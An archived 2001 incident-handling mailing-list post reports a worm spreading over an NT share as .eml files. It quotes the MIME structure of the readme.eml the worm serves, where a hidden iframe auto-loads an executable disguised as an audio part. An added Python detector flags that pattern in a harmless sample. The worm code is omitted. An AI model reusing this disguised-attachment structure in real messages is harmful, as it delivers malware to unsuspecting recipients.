I've just seen this infest an NT share. I've isolated it to one drive (this machine is a fileserver with no access of its own to the internet). Further following behaviour, this worm copies itself into available directories (I think using a client machine, as this is restricted to one drive only one department has access to), naming itself the same as other files in that directory, except as a .eml. Upon opening in a text editor, the same content as described below by Pedro appears.

> When I connected to the originating server (femm.tdkomm.com.br), I
> saw the normal web page for the institution, plus a pop-up window for
> http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
> follows:
>
> MIME-Version: 1.0
> Content-Type: multipart/related;
>     type="multipart/alternative";
>     boundary="====_ABC1234567890DEF_===="
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Unsent: 1
>
> --====_ABC1234567890DEF_====
> Content-Type: multipart/alternative;
>     boundary="====_ABC0987654321DEF_===="
>
> --====_ABC0987654321DEF_====
> Content-Type: text/html;
>     charset="iso-8859-1"
> Content-Transfer-Encoding: quoted-printable
>
> <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
> </iframe></BODY></HTML>
> --====_ABC0987654321DEF_====--
>
> --====_ABC1234567890DEF_====
> Content-Type: audio/x-wav;
>     name="readme.exe"
> Content-Transfer-Encoding: base64
> Content-ID: <EA4DMGBP9p>
>
> ... (worm code follows)
>
> I've inspected the executable code, and it reads like a worm. (doh)
>
> Has anyone seen this?
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
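An added example, not part of the post or the list archive: it parses a constructed .eml built to the same shape as the message Pedro quotes and flags the two things that make it suspicious, a hidden iframe that loads a cid: part, and an inline part declared audio/x-wav whose name is readme.exe and whose payload starts with an MZ header. The sample embeds a 16-byte MZ stub rather than the worm, and the function name analyse_eml is my own choice.

```python
import re
from email import message_from_bytes, policy

# Constructed sample modelled on the readme.eml quoted above (the base64
# payload is a 16-byte MZ stub, not the worm): a zero-size iframe whose src
# is a cid: URI, resolving to a part declared audio/x-wav but named .exe.
SAMPLE_EML = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AAA==
--====_ABC1234567890DEF_====--
"""

# cid: references made from an <iframe src=...> in the HTML body
IFRAME_CID = re.compile(r'<iframe[^>]*\bsrc=["\']?cid:([^\s"\'>]+)', re.I)

def analyse_eml(raw: bytes) -> list[str]:
    msg = message_from_bytes(raw, policy=policy.default)
    iframe_cids: set[str] = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            # get_content() undoes the quoted-printable encoding (=3D -> =)
            iframe_cids.update(IFRAME_CID.findall(part.get_content()))
    findings = []
    for part in msg.walk():
        cid = (part.get("Content-ID") or "").strip("<>")
        if not cid:
            continue
        ctype = part.get_content_type()
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""   # base64 decoded
        if cid in iframe_cids:
            findings.append(f"iframe auto-loads inline part cid:{cid} ({ctype}, name={name!r})")
        if (payload.startswith(b"MZ") or name.lower().endswith(".exe")) and not ctype.startswith("application/"):
            findings.append(f"cid:{cid} declared {ctype} but carries a PE executable")
    return findings
```

Run against SAMPLE_EML the function reports both the iframe-to-cid link and the audio/x-wav part that is really an executable; a plain text message yields no findings.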
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:26:52 PDT